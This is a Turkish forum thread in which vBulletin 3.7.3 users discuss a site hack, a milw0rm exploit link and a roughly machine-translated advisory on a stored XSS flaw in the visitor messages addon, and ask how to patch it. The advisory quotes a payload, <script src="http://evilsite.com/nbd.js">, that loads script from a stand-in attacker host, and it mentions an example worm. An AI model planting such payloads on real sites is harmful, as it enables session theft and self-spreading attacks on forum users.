Vbulletin 3.7.3 Açıgı Dikkat
-
arkadaşlar 2 qün önce vbulletin kullandıgım için hack yedim. hackleyen kişiye ulaştım tabi .. ve sonuçta includes klasöründeki class_dm_moderator.php isimli dosyayı silmem gerektigini söyledi sildim ve açık kapandı dedi. ki ne kadar dogru bilinmez bu konu hakkında bilgisi olan varmı bana bol bol yazı gönderiyordu şu şekilde
[options]
Edit
Delete
CHMOD
Rename
Download
Copy 19.33 kb metalhead/metalhead -rw-r--r--
2 class_dm_deletionlog.php [options] -
bu arada linux serverda işe yarıyormuş windows serveerda yaramıyormuş
-
http://www.milw0rm.com/exploits/7174
Açık bu arkadaşlarda bunun tam açılımını yapabilecek bi arkadaş varmı ?
-
bychaos bunu yazdı:
-----------------------------http://www.milw0rm.com/exploits/7174
Açık bu arkadaşlarda bunun tam açılımını yapabilecek bi arkadaş varmı ?
-----------------------------
Xss olduğu herhalinden belliüsteki yazıyı çevittirebilsek düzgün bir şekilde gerisi gelir zaten . :)
-
yoyo bunu yazdı:
-----------------------------bychaos bunu yazdı:
-----------------------------http://www.milw0rm.com/exploits/7174
Açık bu arkadaşlarda bunun tam açılımını yapabilecek bi arkadaş varmı ?
-----------------------------
Xss olduğu herhalinden belliüsteki yazıyı çevittirebilsek düzgün bir şekilde gerisi gelir zaten . :)
-----------------------------çevirtilmiş hali;
Açıklama = kritik bir güvenlik açığı, yeni vBulletin 3.7.3 yazılım olarak dahil gelir var
+ with the visitor messages addon (a clone of a social network wall/comment area). Bir sosyal ağ duvarın ziyaretçi mesajları addon ile + (bir klon / yorum alan).
- When posting XSS, the data is run through htmlentities(); before being displayed - Ne zaman XSS ilanıyla, veri htmlentities ile çalıştırılan (); önce gösterilir
+ to the general public/forum members. + Genel kamu / forum üyelerine. However, when posting a new message, Ancak, yeni bir mesaj gönderme
- a new notification is sent to the commentee. - Yeni bir bildirim ve commentee gönderilir. The commenter posts a XSS vector such as Bu yorumcu gibi bir XSS vektör mesajlar
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php + <script src="http://evilsite.com/nbd.js">, ve ne zaman commentee usercp.php ziyaret
- under the domain, they are hit with an unfiltered xss attach. Etki alanı - altında bir Filtrelenmemiş XSS iliştirebilirsiniz ile isabet bulunmaktadır. XSRF is also readily available XSRF de kolaylıkla kullanılabilir
+ and I have included an example worm that makes the user post a new thread with your own + Ve bu kullanıcı kendi yeni bir iplik sonrası kılan bir örnek solucan yer var
- specified subject and message. - Belirtilen konu ve mesaj. -
beyler bu açıgı nasıl kapatırız bileniniz varmı
